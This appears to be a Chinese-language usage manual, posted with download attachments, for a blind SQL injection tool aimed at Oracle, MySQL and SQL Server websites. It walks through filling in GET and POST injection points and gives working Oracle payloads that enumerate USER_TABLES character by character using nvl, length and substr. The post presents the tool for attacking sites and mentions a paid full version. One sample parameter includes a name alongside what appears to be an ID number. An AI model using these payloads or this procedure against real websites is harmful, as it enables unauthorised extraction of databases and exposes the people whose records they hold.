SQL Inject Portable Tool(SQL注入工具)
[attachment=332]
SQL Inject Portable Tool使用说明
本工具是用来进行SQL注入的工具,主要针对一些没有错误返回信息的网站的表结构猜解(当然,如果有错误返回这个工具也适用,只是没必要使用这个工具了,因为有更好更快捷的工具),
尤其是Java+Oracle,PHP+MySQL以及一部分ASP+SQLServer的网站。
注意:测试版只有手动猜测模式(Common模式),需要Oracle和SQLServer自动模式的请注册以获取完全版本。
Oracle、SQLServer模式使用方法如下:
1. Get方法:
a) URL中的填写与Common模式不同,这里只需要输入URL就可以了,如果可注入的参数为字符类型,请在相应的位置添加'来标明;
URL的填写如下:
http://www.XXX.com/tsl2.jsp?pname=1'&id=1234
^注意pname为字符类型的,所以添加了'。
b) 方法选择Get,在URL输入框中点击注入点
如:http://www.XXX.com/tsl2.jsp?pname=1'&id=1234
^鼠标点击点放在'后,用于更改Position输入框中的注入点值
c) RefURL可填写(有些网站为防止盗链,必须填写)
d) 选择Table Guess、Row Guess或者Detail Guess其中之一,注意,如果要进行Row Guess,必须在Table Name组合框中选择或者输入表名;如果要进行Detail Guess,除了输入表名之外
,还需要输入需要猜解的列的名字,格式为:Row1|Row2|....|
e) 选择数据库的字符集,针对数据库的中文内容而设置,如果猜解结果存在乱码,选择适当的字符集重新猜解,其中unicode和double byte为双字节,UTF-8为3字节;
f) 输入猜解的条件,使用者需要熟悉SQL语句的语法;
g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
h) 模式选择Oracle或者SQLServer
i) Fire!
j) 猜解的最终结果显示在最下面得Edit中
2. Post方法:
a) URL中的填写与Common模式不同,这里只需要输入URL就可以了
b) 方法选择Post,同时填入Post参数(如果是字符串型注入则加'),然后将鼠标放在注入点之后
如:Name=单荣花'&sfzh=211222198201125228&ID_Year=2005&B1=提交
^鼠标点击点放在'后,用于更改Position输入框中的注入点值
c) RefURL可填写(有些网站为防止盗链,必须填写)
d) 选择Table Guess、Row Guess或者Detail Guess其中之一,注意,如果要进行Row Guess,必须在Table Name组合框中选择或者输入表名;如果要进行Detail Guess,除了输入表名之外
,还需要输入需要猜解的列的名字,格式为:Row1|Row2|....|
e) 选择数据库的字符集,针对数据库的中文内容而设置,如果猜解结果存在乱码,选择适当的字符集重新猜解,其中unicode和double byte为双字节,UTF-8为3字节;
f) 输入猜解的条件,使用者需要熟悉SQL语句的语法;
g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
h) 模式选择Oracle或者SQLServer
i) Fire!
j) 猜解的最终结果显示在最下面得Edit中
Common模式下使用方法如下:
1. Oracle+GET+数字猜解:
a) URL的填写如下:
http://www.XXX.com/tsl2.jsp?pname=1' and 0<nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER
BY 1DESC)WHERE ROWNUM<=1)),0) --
b) 方法选择Get
c) RefURL可填写(有些网站为防止盗链,必须填写)
d) 选择IsNumber
e) Position可由程序自动填写,将鼠标输入位置放到URL项需要做判断的数字(此处为"0")之后,程序自动填写Position;
f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为数字,如:255;
g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
h) 模式选择Common
i) Fire!
j) 猜解的最终结果显示在最下面得Edit中
2. Oracle+POST+数字猜解:
a) URL的填写如下:
http://www.XXX.com/tsl2.jsp
b) 方法选择POST,参数填写
pname=1' and 0<nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE
ROWNUM<=1)),0) --&B1=提交
多个参数以&间隔;
c) RefURL可填写(有些网站为防止盗链,必须填写)
d) 选择IsNumber
e) Position可由程序自动填写,将鼠标输入位置放到POST参数项需要做判断的数字(此处为"0")之后,程序自动填写Position;
f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为数字,如:255;
g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
h) 模式选择Common
i) Fire!
j) 猜解的最终结果显示在最下面得Edit中
3. Oracle+GET+字符猜解:
a) URL的填写如下:
http://www.XXX.com/tsl2.jsp?pname=1' or 'T'=substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY
1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1)--
b) 方法选择Get
c) RefURL可填写(有些网站为防止盗链,必须填写)
d) 取消IsNumber
e) Position可由程序自动填写,将鼠标输入位置放到URL项需要做判断的数字(此处为"T")之后,程序自动填写Position;
f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为字符,如:Z;
g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
h) 模式选择Common
i) Fire!
j) 猜解的最终结果显示在最下面得Edit中
2. Oracle+POST+字符猜解:
a) URL的填写如下:
http://www.XXX.com/tsl2.jsp
b) 方法选择POST,参数填写
pname=1' or 'T'=substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER
BY 1DESC)WHERE ROWNUM<=1),1,1)--&B1=提交
多个参数以&间隔;
c) RefURL可填写(有些网站为防止盗链,必须填写)
d) 取消IsNumber
e) Position可由程序自动填写,将鼠标输入位置放到POST参数项需要做判断的数字(此处为"T")之后,程序自动填写Position;
f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为数字,如:Z;
g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
h) 模式选择Common
i) Fire!
j) 猜解的最终结果显示在最下面得Edit中
点击下载:[attachment=333]
